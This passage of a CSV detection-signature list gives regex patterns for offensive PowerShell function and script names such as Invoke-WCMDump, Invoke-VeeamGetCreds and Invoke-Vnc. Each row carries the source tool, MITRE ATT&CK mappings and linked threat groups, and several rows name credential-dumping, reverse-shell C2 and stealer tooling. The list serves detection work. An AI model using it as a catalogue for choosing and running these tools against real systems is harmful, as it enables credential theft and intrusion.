"*Invoke-UserImpersonation -Credential *",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","49790"
"*Invoke-UserImpersonation -Credential * -Quiet*",".{0,1000}Invoke\-UserImpersonation\s\-Credential\s.{0,1000}\s\-Quiet.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49791"
"*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49792"
"*Invoke-UserImpersonation*",".{0,1000}Invoke\-UserImpersonation.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49793"
"*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","49794"
"*Invoke-UsernameHarvestEAS*",".{0,1000}Invoke\-UsernameHarvestEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49795"
"*Invoke-UsernameHarvestGmail*",".{0,1000}Invoke\-UsernameHarvestGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49796"
"*Invoke-UsernameHarvestOWA*",".{0,1000}Invoke\-UsernameHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49797"
"*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49798"
"*Invoke-UserPrivilegesCheck*",".{0,1000}Invoke\-UserPrivilegesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49799"
"*Invoke-UserRestrictedSidsCheck*",".{0,1000}Invoke\-UserRestrictedSidsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49800"
"*Invoke-UserSessionListCheck*",".{0,1000}Invoke\-UserSessionListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49801"
"*Invoke-UsersHomeFolderCheck*",".{0,1000}Invoke\-UsersHomeFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49802"
"*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49803"
"*Invoke-VaultCredCheck*",".{0,1000}Invoke\-VaultCredCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49804"
"*Invoke-VaultListCheck*",".{0,1000}Invoke\-VaultListCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49805"
"*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49806"
"*Invoke-VeeamGetCreds*",".{0,1000}Invoke\-VeeamGetCreds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","49807"
"*Invoke-Vnc*",".{0,1000}Invoke\-Vnc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49808"
"*Invoke-Vnc.ps1*",".{0,1000}Invoke\-Vnc\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49809"
"*Invoke-VNCServer.ps1*",".{0,1000}Invoke\-VNCServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49810"
"*Invoke-VNCViewer.ps1*",".{0,1000}Invoke\-VNCViewer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49811"
"*Invoke-VoiceTroll.ps1*",".{0,1000}Invoke\-VoiceTroll\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49812"
"*Invoke-Vulmap*",".{0,1000}Invoke\-Vulmap.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49813"
"*Invoke-VulnerableADCSTemplates*",".{0,1000}Invoke\-VulnerableADCSTemplates.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49814"
"*Invoke-Watson*",".{0,1000}Invoke\-Watson.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49815"
"*Invoke-watson*",".{0,1000}Invoke\-watson.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49816"
"*Invoke-Watson.ps1*",".{0,1000}Invoke\-Watson\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49817"
"*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","10","8","722","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z","49818"
"*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49819"
"*Invoke-WCMDump.ps1*",".{0,1000}Invoke\-WCMDump\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","49820"
"*Invoke-WDigest.ps1*",".{0,1000}Invoke\-WDigest\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49821"
"*Invoke-WdigestDowngrade*",".{0,1000}Invoke\-WdigestDowngrade.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49822"
"*Invoke-WebCamAvi.ps1*",".{0,1000}Invoke\-WebCamAvi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49823"
"*Invoke-WebRequest https://tinyurl.com/*",".{0,1000}Invoke\-WebRequest\shttps\:\/\/tinyurl\.com\/.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","49824"
"*Invoke-WebRequest -Uri ""http://ip-api.com/line/?*",".{0,1000}Invoke\-WebRequest\s\-Uri\s\""http\:\/\/ip\-api\.com\/line\/\?.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","49826"
